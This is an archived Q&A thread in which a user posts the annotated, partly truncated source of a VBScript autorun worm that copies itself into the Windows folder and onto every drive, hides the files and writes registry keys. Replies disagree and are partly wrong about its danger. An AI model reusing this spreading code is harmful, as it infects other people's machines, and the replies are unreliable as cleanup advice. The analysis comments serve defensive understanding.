Question:
so how bad is this virus i found on my flash drive on a scale from 1-10 am i screwed?
?
2009-08-09 15:29:44 UTC
It's a .vbs file hidden as a system file on my thumb drive; here it is below:
-------------------------------------------------------------------------------------------
' Analysis notes (defender's reading of the listing below):
' Self-copying VBScript that spreads through Autorun.inf. Run from any folder other
' than the Windows folder, it copies its own source to <windir>\Nar.vbs and starts
' that copy. Run from the Windows folder, it loops forever: once a minute it rewrites
' nar.vbs and Autorun.inf in the root of every removable and fixed drive and performs
' six registry writes.
' Artefacts visible in this listing: nar.vbs in the Windows folder and in drive roots,
' Autorun.inf in drive roots, both with attributes 39 (read-only + hidden + system +
' archive), which hides them from a default Explorer view.
' NOTE(review): several lines were cut off by the site ("…"), so the dim list, the
' autorun command line and all six registry paths/values are incomplete here.
'v0.1

' Every runtime error is ignored, so failed file or registry operations are silent.
on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,f…

set fso = CreateObject("Scripting.FileSystemObject…
set shell = CreateObject("Wscript.shell")
' mf is this script's own file; nar_RunDir is the folder it was started from.
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
' Special folder 0 is the Windows folder.
Set windir = fso.getspecialfolder(0)
' in_WinDir starts at 2 and is set further down: 0 = started outside the Windows
' folder, 1 = started from the Windows folder.
in_WinDir = 2
' Path of the script host executable; not referenced again in the visible lines.
wsh_Path = fso.GetFile(Wscript.Fullname)

' The next three blocks look like an attempt to delete an older copy, but each test is
' true only when the file does NOT exist (FileExists(...) = 0), so GetFile fails, and
' Kill is not a VBScript built-in. With errors suppressed they appear to do nothing.
' in_WinDir is still 2 here, so the "or in_WinDir = 1" part cannot be true.
If (fso.FileExists(Windir & "\nar.vbs") = 0 or in_WinDir = 1) then
set to_File = fso.getfile(windir & "\nar.vbs")
to_File.attributes = 32
Kill (windir & "\nar.vbs")
End If
If (fso.FileExists("C:\Windows\System\nar.v… = 0) then
set to_File = fso.getfile("C:\Windows\System\nar.vbs")
to_File.attributes = 32
Kill ("C:\Windows\System\nar.vbs")
End If
If (fso.FileExists("C:\nar.vbs") = 0) then
set to_File = fso.getfile("C:\nar.vbs")
to_File.attributes = 32
Kill ("C:\nar.vbs")
End If

' Decide which role this run plays. When started outside the Windows folder it also
' opens an Explorer window on the start folder - presumably so that opening the drive
' still looks normal to the user.
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

' Continue only if no copy exists in the Windows folder yet, or if this IS that copy.
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

' Text for Autorun.inf: an [autorun] section whose shellexecute entry starts wscript
' on nar.vbs (the middle of the command is truncated in this listing).
autorun = "[autorun]"&vbcrlf&"shellexecute=wscript… nar.vbs"
' Read this script's own source into narsource (1 = for reading, -2 = system default
' text format).
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


' Install step (started outside the Windows folder): write the source to
' <windir>\Nar.vbs. Attributes 32 (archive) clear the flags of any existing copy so it
' can be overwritten; 39 = 1 + 2 + 4 + 32 marks it read-only, hidden, system, archive.
' In CreateTextFile the second argument is the overwrite flag and the third asks for
' Unicode output.
If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

' Resident loop (started from the Windows folder). in_WinDir is never changed inside
' the loop, so it runs until the wscript process is terminated.
do while (in_WinDir = 1)
for each disk_Drive in fso.drives
' DriveType 1 = removable, 2 = fixed disk.
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

' Drop (or overwrite) nar.vbs in the drive root and hide it again.
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.pa… & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

' Same for Autorun.inf; any Autorun.inf already on the drive is replaced.
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.pa… & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next

' Six registry writes under HKLM, HKCU and HKU\.DEFAULT, repeated on every pass. The
' key paths and data are truncated here, so their purpose cannot be read from this
' listing.
' NOTE(review): presumably persistence and/or Explorer display settings - recover the
' full paths from the original file and compare them with a known-good machine.
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\W…
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro…
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W…
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W…
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wi…
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\…

' Wait 60 seconds, then rewrite the files and registry values again.
wscript.sleep(60000)
loop

' Reached only when started outside the Windows folder: launch the installed copy
' without waiting for it (window style 1, wait flag 0). That copy then runs the
' resident loop above.
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
Five answers:
vulcan
2009-08-09 15:38:37 UTC
Interesting! thanks for the code, it's a rootkit. Just the code, without the executable harmless. But look out when I drop it into one of my compilers.
?
2009-08-09 16:29:47 UTC
Your computer is still working so it can't be too bad.



Try one of the free antivirus programs available at http://www.freebugfix.com and make sure you do a full system scan.



I can recommend AVG.
chanuchess
2009-08-09 15:49:17 UTC
Don't worry about it... it's not dangerous... Just scan/heal with a good antivirus program.
?
2009-08-09 15:45:58 UTC
I don't know, but here's a link to something that seems to have gotten rid of the problem. Read the whole thread before taking action: The suggested action didn't seem to work for the guy, but he did find a solution:



http://www.bleepingcomputer.com/forums/topic185812.html



Good luck.
JimF
2009-08-09 15:33:57 UTC
You are lucky it didn't go into your computer. Reformat the USB if possible. You're screwed: 10.


This content was originally posted on Y! Answers, a Q&A website that shut down in 2021.